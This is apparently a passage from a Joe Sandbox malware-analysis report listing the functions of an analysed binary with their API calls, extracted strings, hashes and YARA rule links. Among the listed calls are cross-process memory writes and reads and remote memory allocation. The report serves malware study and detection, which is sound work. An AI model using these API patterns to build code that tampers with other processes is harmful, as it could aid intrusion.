                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Window$ForegroundPixelRelease
                                                  • String ID:
                                                  • API String ID: 4156661090-0
                                                  • Opcode ID: a2fdce6e3bddf0b871ca8340d6d669a09c6e66c5d4b7dc830b901d07a506ddb0
                                                  • Instruction ID: e8196613b0df86bc5a27bd39e2adf1c09884d6a34d83c80a32084cb7e49be038
                                                  • Opcode Fuzzy Hash: a2fdce6e3bddf0b871ca8340d6d669a09c6e66c5d4b7dc830b901d07a506ddb0
                                                  • Instruction Fuzzy Hash: 5A219F35A00204AFD700EF65D888BAEBBE5FF49310F15807DF84997362CA30AD41DB90
                                                  Function 00BC12F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BC134D
                                                  • SelectObject.GDI32(?,00000000), ref: 00BC135C
                                                  • BeginPath.GDI32(?), ref: 00BC1373
                                                  • SelectObject.GDI32(?,00000000), ref: 00BC139C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ObjectSelect$BeginCreatePath
                                                  • String ID:
                                                  • API String ID: 3225163088-0
                                                  • Opcode ID: 37cc6aa27cd599e3212161554bee028202c51fd525c70307b58690dbaa4fd7c2
                                                  • Instruction ID: 15779a461a85e101833e564d818cabe2459c881db643da874f8bbaefd1358ef4
                                                  • Opcode Fuzzy Hash: 37cc6aa27cd599e3212161554bee028202c51fd525c70307b58690dbaa4fd7c2
                                                  • Instruction Fuzzy Hash: A4216D30840648EFDB108F69DC48B6D7BE8FB42325F14466BF810A61F1D7B09896DF98
                                                  Function 00C1BC9E Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _memcmp
                                                  • String ID:
                                                  • API String ID: 2931989736-0
                                                  • Opcode ID: 3752829d81df0de349c84aefdcb6300a38fc1f5375c5ea8869ca4dc2e0d11790
                                                  • Instruction ID: 5f605bf9ed08dfc090d10b857938be73d1864af03ab0d5ff6fa09c11a8870187
                                                  • Opcode Fuzzy Hash: 3752829d81df0de349c84aefdcb6300a38fc1f5375c5ea8869ca4dc2e0d11790
                                                  • Instruction Fuzzy Hash: 0401F9722001097BE2046A1B6D52FFBB3ACDE53388B144460FD0596343FB20EE94AAE4
                                                  Function 00C24A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentThreadId.KERNEL32 ref: 00C24ABA
                                                  • __beginthreadex.LIBCMT ref: 00C24AD8
                                                  • MessageBoxW.USER32(?,?,?,?), ref: 00C24AED
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00C24B03
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00C24B0A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                  • String ID:
                                                  • API String ID: 3824534824-0
                                                  • Opcode ID: 80a7bd77db3916d9605e2965d435ebb0fb61eaf55563284a400701ba70b2918f
                                                  • Instruction ID: 99fd054dd5ecce1afaa3464727a46a205d95700cd6db00957db361381cd4dc8e
                                                  • Opcode Fuzzy Hash: 80a7bd77db3916d9605e2965d435ebb0fb61eaf55563284a400701ba70b2918f
                                                  • Instruction Fuzzy Hash: 3F11047AD04669FBC7058FA8AC08BDF7FACEB45320F144269F824D3250DAB1C9048BA1
                                                  Function 00C18202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C1821E
                                                  • GetLastError.KERNEL32(?,00C17CE2,?,?,?), ref: 00C18228
                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00C17CE2,?,?,?), ref: 00C18237
                                                  • HeapAlloc.KERNEL32(00000000,?,00C17CE2,?,?,?), ref: 00C1823E
                                                  • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C18255
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                  • String ID:
                                                  • API String ID: 842720411-0
                                                  • Opcode ID: 5a8c03583b7987dda8a71592d1b44100ef53a55da319621f2e7891be090786af
                                                  • Instruction ID: 1d8cf2904a740f777530b7a46affc992b1dbdf34b69b2391932b750850d6c2fa
                                                  • Opcode Fuzzy Hash: 5a8c03583b7987dda8a71592d1b44100ef53a55da319621f2e7891be090786af
                                                  • Instruction Fuzzy Hash: 00014675604204AFDB214FA6DC48EAF7FACFF8B754B600429FD59C2260DA318D46DA60
                                                  Function 00C1710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C17044,80070057,?,?,?,00C17455), ref: 00C17127
                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C17044,80070057,?,?), ref: 00C17142
                                                  • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C17044,80070057,?,?), ref: 00C17150
                                                  • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C17044,80070057,?), ref: 00C17160
                                                  • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C17044,80070057,?,?), ref: 00C1716C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                                  • String ID:
                                                  • API String ID: 3897988419-0
                                                  • Opcode ID: 184b3afd30ade610c25073702db372630be399888af3398b6c6e17fccc370555
                                                  • Instruction ID: bc260588dc977b0b51bf0389e822ba3e404f070d652d58db383d2a5da3a7ed40
                                                  • Opcode Fuzzy Hash: 184b3afd30ade610c25073702db372630be399888af3398b6c6e17fccc370555
                                                  • Instruction Fuzzy Hash: 2E018476601204BBDB114F64DC44BAE7BBDFF46751F240168FD09D6220D771DD82A7A0
                                                  Function 00C25244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C25260
                                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00C2526E
                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C25276
                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00C25280
                                                  • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C252BC
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                  • String ID:
                                                  • API String ID: 2833360925-0
                                                  • Opcode ID: edd16b99a356b5342f6a07e39deea2da8e7ca2ec03e4a16d42e4500b2f16956f
                                                  • Instruction ID: 1a135383ff27b8b82d32200aa882ffa1ec011fdea7f9bae49aca45b8144ea737
                                                  • Opcode Fuzzy Hash: edd16b99a356b5342f6a07e39deea2da8e7ca2ec03e4a16d42e4500b2f16956f
                                                  • Instruction Fuzzy Hash: E0015735D01A2DDBCF00EFE5E848BEEBBB8BB0A711F41005AE951F2180CB70955187A1
                                                  Function 00C1810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C18121
                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C1812B
                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C1813A
                                                  • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C18141
                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C18157
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                  • String ID:
                                                  • API String ID: 44706859-0
                                                  • Opcode ID: 2d9878dd9d24fe6d49e7fc045027fb936c8a2e4c5c91ea671785e659ed25def3
                                                  • Instruction ID: 8c5f2402f86b57236d27880f1ef6f2d82ee3989f530dc7e968149ac2ceb54991
                                                  • Opcode Fuzzy Hash: 2d9878dd9d24fe6d49e7fc045027fb936c8a2e4c5c91ea671785e659ed25def3
                                                  • Instruction Fuzzy Hash: 11F04475244304BFE7110FA5DC88FAF3BADFF87754B200029F545C6150CAA19947DA60
                                                  Function 00C1C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003E9), ref: 00C1C1F7
                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 00C1C20E
                                                  • MessageBeep.USER32(00000000), ref: 00C1C226
                                                  • KillTimer.USER32(?,0000040A), ref: 00C1C242
                                                  • EndDialog.USER32(?,00000001), ref: 00C1C25C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                  • String ID:
                                                  • API String ID: 3741023627-0
                                                  • Opcode ID: 64afa2ad21f0b46c6e6521412b3978b390502456fcfb323f127c546a03f94de6
                                                  • Instruction ID: 0a38fdfd7c3adb8ba19c1938be7ca4066ae2d388aa759a34927d105a587f2bb0
                                                  • Opcode Fuzzy Hash: 64afa2ad21f0b46c6e6521412b3978b390502456fcfb323f127c546a03f94de6
                                                  • Instruction Fuzzy Hash: 9201D634444704ABEB205B64ED8EFDA77B8FF02B06F00026DF592A14E1DBF46985DB90
                                                  Function 00BC13B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • EndPath.GDI32(?), ref: 00BC13BF
                                                  • StrokeAndFillPath.GDI32(?,?,00BFB888,00000000,?), ref: 00BC13DB
                                                  • SelectObject.GDI32(?,00000000), ref: 00BC13EE
                                                  • DeleteObject.GDI32 ref: 00BC1401
                                                  • StrokePath.GDI32(?), ref: 00BC141C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                  • String ID:
                                                  • API String ID: 2625713937-0
                                                  • Opcode ID: 20f92558973406172df185cb370b1d23a4eab5fdf87fbae6442e37e2d33657bc
                                                  • Instruction ID: 1c8e09086e035df687be7982ff670709f85ec9303d0848fabbb0fca8fdb6ebe5
                                                  • Opcode Fuzzy Hash: 20f92558973406172df185cb370b1d23a4eab5fdf87fbae6442e37e2d33657bc
                                                  • Instruction Fuzzy Hash: F9F03C34040B48EBDB255F2AEC4CB5C3FE4FB42326F18826AE429581F2C7704996DF18
                                                  Function 00BD2CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BE0DB6: std::exception::exception.LIBCMT ref: 00BE0DEC
                                                    • Part of subcall function 00BE0DB6: __CxxThrowException@8.LIBCMT ref: 00BE0E01
                                                    • Part of subcall function 00BC7DE1: _memmove.LIBCMT ref: 00BC7E22
                                                    • Part of subcall function 00BC7A51: _memmove.LIBCMT ref: 00BC7AAB
                                                  • __swprintf.LIBCMT ref: 00BD2ECD
                                                  Strings
                                                  • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00BD2D66
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                  • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                  • API String ID: 1943609520-557222456
                                                  • Opcode ID: 86d6467e7f51f751407a5be7cde3943fe0dfc92f527bcf709d98dba0307b697b
                                                  • Instruction ID: f64cd93ecf9c85ce18fdcf4e2a6b6a26cd6c5e6ea81d8e7936dba420431a7374
                                                  • Opcode Fuzzy Hash: 86d6467e7f51f751407a5be7cde3943fe0dfc92f527bcf709d98dba0307b697b
                                                  • Instruction Fuzzy Hash: F5915C71118241AFC714EF24C885D6FB7E4EF95710F0049AEF8969B2A1EB70EE44CB62
                                                  Function 00C2B93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BC4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BC4743,?,?,00BC37AE,?), ref: 00BC4770
                                                  • CoInitialize.OLE32(00000000), ref: 00C2B9BB
                                                  • CoCreateInstance.OLE32(00C52D6C,00000000,00000001,00C52BDC,?), ref: 00C2B9D4
                                                  • CoUninitialize.OLE32 ref: 00C2B9F1
                                                    • Part of subcall function 00BC9837: __itow.LIBCMT ref: 00BC9862
                                                    • Part of subcall function 00BC9837: __swprintf.LIBCMT ref: 00BC98AC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                  • String ID: .lnk
                                                  • API String ID: 2126378814-24824748
                                                  • Opcode ID: b7cb4511cbe641dfe53eba3bbf56bf74bddb7ddd7b331053339de7d549962ca6
                                                  • Instruction ID: 454621f9931e844e4f2924153f6604ef4e6f2c5d6dad51821a813de3486b3da8
                                                  • Opcode Fuzzy Hash: b7cb4511cbe641dfe53eba3bbf56bf74bddb7ddd7b331053339de7d549962ca6
                                                  • Instruction Fuzzy Hash: 4DA134756042159FCB00DF14C884E6ABBE5FF89314F14899CF8AA9B3A1CB31ED46CB91
                                                  Function 00BE501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __startOneArgErrorHandling.LIBCMT ref: 00BE50AD
                                                    • Part of subcall function 00BF00F0: __87except.LIBCMT ref: 00BF012B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ErrorHandling__87except__start
                                                  • String ID: pow
                                                  • API String ID: 2905807303-2276729525
                                                  • Opcode ID: e787c5fcccb1d4366ca9a76b034dfc09ade530c03f949d8ee44863d2e9864157
                                                  • Instruction ID: 29b64213c599808c7158a74bdd8c1bcef82b4db37e336fb177fd6e59fad8d04c
                                                  • Opcode Fuzzy Hash: e787c5fcccb1d4366ca9a76b034dfc09ade530c03f949d8ee44863d2e9864157
                                                  • Instruction Fuzzy Hash: 3851772192C64A86DB217725CD4137E2BD0EB40704F208AD9F5D5972BBEF348ECC9A86
                                                  Function 00BD6192 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _memset$_memmove
                                                  • String ID: ERCP
                                                  • API String ID: 2532777613-1384759551
                                                  • Opcode ID: ea457a8f8ae9a5c042d1e2704ecb88527d1766230fbeb67e00c69475a15b73c6
                                                  • Instruction ID: a707b41ff6e70497fd2b82bd2be4bd302f082c0397e6f3cb7052f18d8ac49020
                                                  • Opcode Fuzzy Hash: ea457a8f8ae9a5c042d1e2704ecb88527d1766230fbeb67e00c69475a15b73c6
                                                  • Instruction Fuzzy Hash: 71516FB1900705DBDB24DF69C981BAAB7E4FF44314F2085AFE54ADB251E770EA94CB40
                                                  Function 00C29734 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BC4F0B: __fread_nolock.LIBCMT ref: 00BC4F29
                                                  • _wcscmp.LIBCMT ref: 00C29824
                                                  • _wcscmp.LIBCMT ref: 00C29837
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _wcscmp$__fread_nolock
                                                  • String ID: (l$FILE
                                                  • API String ID: 4029003684-2160188593
                                                  • Opcode ID: b59bd515074aff890d39cf9ace35fc714478d3c6c3d6ba5473efa356f28f1815
                                                  • Instruction ID: 495e78c4741197a1d1f8e1a44594a06faff02aa2af08889dcd79d7ec22d140a5
                                                  • Opcode Fuzzy Hash: b59bd515074aff890d39cf9ace35fc714478d3c6c3d6ba5473efa356f28f1815
                                                  • Instruction Fuzzy Hash: E841A671A0021ABADF219AA5DC46FEFBBFDEF85710F0044A9F904A7181DB719A04CB61
                                                  Function 00C197F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C214BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C19296,?,?,00000034,00000800,?,00000034), ref: 00C214E6
                                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00C1983F
                                                    • Part of subcall function 00C21487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C192C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00C214B1
                                                    • Part of subcall function 00C213DE: GetWindowThreadProcessId.USER32(?,?), ref: 00C21409
                                                    • Part of subcall function 00C213DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C1925A,00000034,?,?,00001004,00000000,00000000), ref: 00C21419
                                                    • Part of subcall function 00C213DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C1925A,00000034,?,?,00001004,00000000,00000000), ref: 00C2142F
